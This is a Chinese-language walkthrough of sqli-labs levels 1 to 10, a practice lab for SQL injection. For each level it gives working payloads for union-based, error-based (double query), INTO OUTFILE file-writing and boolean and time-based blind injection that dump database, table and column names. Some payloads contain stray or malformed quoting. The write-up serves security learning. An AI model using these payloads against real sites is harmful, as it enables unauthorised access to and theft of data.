sqli-labs(Less1-10)

Less-1:single quotes

URL后加 ?id=1′ order by N%23 猜字段,N为3时显示正常,N为4时报错,得出字段数为3
然后联合查询:

?id=1' and 1=2 union select 1,2,3'#

得出注入点为2,3
把 union select 1,2,3 中的2,3逐次替换成user(),version(),database()查询数据,依次得到root@localhost, 10.1.19-MariaDB, security
payload:

?id=1' and 1=2 union select 1,user(),version()'#

爆数据表名称:

and 1=2 union select 1,group_concat(TABLE_NAME),3 from information_schema.tables where  table_schema = database()%23

Table:emails,referers,uagents,users

使用payload(16进制为查出来的表名):

and 1=2 union select 1,group_concat(COLUMN_NAME),3 from information_schema.columns where  TABLE_NAME =0x7265666572657273 %23





查询得出各数据表的列名

因为每个数据库都是一样的,所有下面的都不再放图片

Less-2:intiger

用?id=1 order by N爆出有3列字段
联合查询后得出注入点依然为2,3
查询得出Database(),user()分别为 security,root@localhost
payload:

?id=1 and 1=2 union select 1,database(),user()

查所有表名

?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()

查所有列

?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name =0x656d61696c73

Less-3:single quotes with twist

测试闭合类型,测试得出为 ‘)

?id=1') order by N%23

爆出字段为3,再联合查询:

?id=1') and 1=2 union select 1,2,3%23

得出注入点为2,3
查询user(),database()

?id=1') and 1=2 union select 1,user(),database()%23

爆数据表

?id=1') and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()%23

修改相应表名可爆出所有列名

?id=1') and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name =0x656d61696c73 %23

Less-4:Double Quotes

测试后,可使用 ?id=1″ 来查看报错
然后闭合语句顺便查询字段

?id=1") order by N

得出字段为3

?id=1") and 1=2 union select 1,2,3%23

得出注入点为2,3
查询user(),database()

?id=1") and 1=2 union select 1,user(),database()%23

查数据表

?id=1") and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()%23

爆列名

?id=1") and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name =0x656d61696c73 %23

Less-5:Double Injection-Single Quotes

用 ?id=1 试探和 ?id=1′ 试探,后者会报错,但加了%23又不报错
了解结构后,用 ?id=1′ order by N %23 爆出字段为3
在我以为又是老套路时,发现查注入点时不会有回显,所以我去百度了盲注,发现了类似的注入方法
http://www.freebuf.com/column/158705.html

然后我仿写了一段:

?id=1' union select 1,count(*),concat(user(),0x26,floor(rand(0)*2))x from information_schema.columns group by x%23


代码中的user()可替换成database()进行查询:

然后查询表名:

?id=1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema = 'security' limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x%23


代码中的 limit 1,1 中的第一个数字可换成2和3,分别得到 uagents和 users

然后查询列名:

?id=1' union select 1,count(*),concat((select column_name from information_schema.columns where table_schema = 'security' and table_name = 'referers' limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x%23


修改 limit 1,1 的前一个数字依次查询列名,修改 table_name 的值依次查询表中的列名

Less-6:Double Injection Double Quotes

测试了一下,原理与Less-5类似,只需把Less-5的注入语句中的单引号改为双引号即可成功注入

Less-7:Dump into outfile

试探过后不显示报错信息,查看了源文件

似乎有意隐藏了报错信息
毫无头绪,只能百度
https://blog.csdn.net/sherlock17/article/details/64454449
sqli-labs less-7

首先我在本机的 MySQL 的 my.ini 里添加了 secure_file_priv = “E:/text”(文件路径仅供参考,代码添加位置随意,感觉别在文件开头处就好)
然后开始注入(由以往注入知道有3字段,亦可通过 union select 1,2,3.. 不断添加数字来爆字段):

?id=1')) union select 1,user(),database() into outfile "E:/text/main.txt" --+

得到外部文件:

导出表名:

?id=1')) union select '*','*', table_name from information_schema.tables where table_schema='security' into outfile "E:/text/table.txt"--+


导出列名(emails):

?id=1')) union select '*','*',column_name from information_schema.columns where table_schema='security' and table_name='emails' into outfile "E:/text/emails.txt"--+

Less-8:Blind-Boolian Based-Single Quotes

经过几次注入测试后得发现:
当注入正确语句时会出现 You Are in… 当出现查询错误时没显示
用 ?id=1′ order by N–+ 得出字段为3
拆分每个数据,对每个字母进行判断再拼凑成完整数据,但每次都手动输入太麻烦且耗时,敲代码跑程序爆数据又不会…
payload:

?id=1' and if(substr((select database()),1,1)='s',0,1)--+

substr(A,a,1)为匹配
A需要自己构建语句,a为1开始依次递增的数字

select database()
select ‘‘,’‘,table_name from information_schema.tables where table_schema=’security’
select ‘‘,’‘,columns_names from information_schema.columns where table_schema=’security’ and table_name = ’emails’

Less-9:Blind-Time Based-Single Quotes

时间型布尔盲注(单引号)
不论注入语法是否正确,页面都不会变动。添加 sleep(10) ,使匹配信息正确时页面存在加载时间,从而进行判断

?id=1' and if(substr(A,a,1),1,1)=x,1,1),0,sleep(10))%23

结构上同,匹配对象x若为字符需要加单引号

Less-10: Blind-Time Based-Double Quotes

时间型布尔盲注(双引号)
把Less-9语句中的单引号换成双引号即可